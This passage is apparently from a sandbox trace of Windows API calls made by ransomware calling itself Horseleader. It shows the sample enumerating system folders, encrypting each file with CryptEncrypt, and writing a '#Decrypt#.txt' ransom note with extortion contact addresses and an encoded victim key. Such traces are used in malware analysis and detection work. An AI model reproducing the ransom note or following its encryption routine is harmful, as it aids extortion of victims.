files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.014] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34ea611, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34ea611, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa063b126, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0251.014] lstrcmpiW (lpString1="adcvbs.inc", lpString2="Windows") returned -1 [0251.014] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 57 [0251.014] StrStrIW (lpFirst="adcvbs.inc", lpSrch=".horseleader") returned 0x0 [0251.014] lstrcmpW (lpString1="adcvbs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.014] lstrcmpW (lpString1="adcvbs.inc", lpString2="_uninstalling_.png") returned 1 [0251.015] lstrlenW (lpString=".testttjffg") returned 11 [0251.015] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", lpSrch=".testttjffg") returned 0x0 [0251.015] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.015] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.015] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0251.015] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0251.015] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 52 [0251.015] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0251.015] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0251.015] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.015] GetProcessHeap () returned 0x780000 [0251.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.016] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*") returned 54 [0251.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.052] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.052] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.") returned 54 [0251.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.052] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0251.053] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.053] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\..") returned 55 [0251.053] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.053] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9351968, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9351968, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0251.053] lstrcmpiW (lpString1="msadcer.dll.mui", lpString2="Windows") returned -1 [0251.053] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 68 [0251.053] StrStrIW (lpFirst="msadcer.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.053] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.053] lstrcmpW (lpString1="msadcer.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.053] lstrlenW (lpString=".testttjffg") returned 11 [0251.053] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.053] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.053] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.054] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc32e361, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xc60371c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xc32e361, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcfr.dll.mui", cAlternateFileName="")) returned 1 [0251.054] lstrcmpiW (lpString1="msadcfr.dll.mui", lpString2="Windows") returned -1 [0251.054] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui") returned 68 [0251.054] StrStrIW (lpFirst="msadcfr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.055] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.055] lstrcmpW (lpString1="msadcfr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.055] lstrlenW (lpString=".testttjffg") returned 11 [0251.055] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.055] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.055] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.055] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.055] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a073ed, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x9e34029, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9a073ed, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msadcor.dll.mui", cAlternateFileName="")) returned 1 [0251.055] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="Windows") returned -1 [0251.055] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 68 [0251.055] StrStrIW (lpFirst="msadcor.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.055] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.056] lstrcmpW (lpString1="msadcor.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.056] lstrlenW (lpString=".testttjffg") returned 11 [0251.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.056] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.056] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.056] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93053f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x93053f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msaddsr.dll.mui", cAlternateFileName="")) returned 1 [0251.056] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="Windows") returned -1 [0251.056] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 68 [0251.056] StrStrIW (lpFirst="msaddsr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.056] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.056] lstrcmpW (lpString1="msaddsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.056] lstrlenW (lpString=".testttjffg") returned 11 [0251.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.057] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.057] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.058] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaprsr.dll.mui", cAlternateFileName="")) returned 1 [0251.058] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="Windows") returned -1 [0251.058] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 69 [0251.058] StrStrIW (lpFirst="msdaprsr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.058] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.058] lstrcmpW (lpString1="msdaprsr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.058] lstrlenW (lpString=".testttjffg") returned 11 [0251.058] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.058] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b8e84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x92b8e84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 1 [0251.058] lstrcmpiW (lpString1="msdaremr.dll.mui", lpString2="Windows") returned -1 [0251.058] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 69 [0251.059] StrStrIW (lpFirst="msdaremr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.059] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.059] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.059] lstrlenW (lpString=".testttjffg") returned 11 [0251.059] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.059] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.059] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.059] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b8e84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x92b8e84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 0 [0251.059] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.061] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\#Decrypt#.txt") returned 66 [0251.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.078] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.078] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.080] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.080] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.080] CloseHandle (hObject=0x158) returned 1 [0251.080] GetProcessHeap () returned 0x780000 [0251.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.080] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac9e93, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0x2cac9e93, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0x2cac9e93, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0251.080] lstrcmpiW (lpString1="handler.reg", lpString2="Windows") returned -1 [0251.080] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned 58 [0251.080] StrStrIW (lpFirst="handler.reg", lpSrch=".horseleader") returned 0x0 [0251.080] lstrcmpW (lpString1="handler.reg", lpString2="#Decrypt#.txt") returned 1 [0251.080] lstrcmpW (lpString1="handler.reg", lpString2="_uninstalling_.png") returned 1 [0251.080] lstrlenW (lpString=".testttjffg") returned 11 [0251.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg", lpSrch=".testttjffg") returned 0x0 [0251.081] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.081] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.081] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handler.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.082] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x2d63e7d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="handsafe.reg", cAlternateFileName="")) returned 1 [0251.082] lstrcmpiW (lpString1="handsafe.reg", lpString2="Windows") returned -1 [0251.082] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned 59 [0251.082] StrStrIW (lpFirst="handsafe.reg", lpSrch=".horseleader") returned 0x0 [0251.082] lstrcmpW (lpString1="handsafe.reg", lpString2="#Decrypt#.txt") returned 1 [0251.083] lstrcmpW (lpString1="handsafe.reg", lpString2="_uninstalling_.png") returned 1 [0251.083] lstrlenW (lpString=".testttjffg") returned 11 [0251.083] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg", lpSrch=".testttjffg") returned 0x0 [0251.083] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 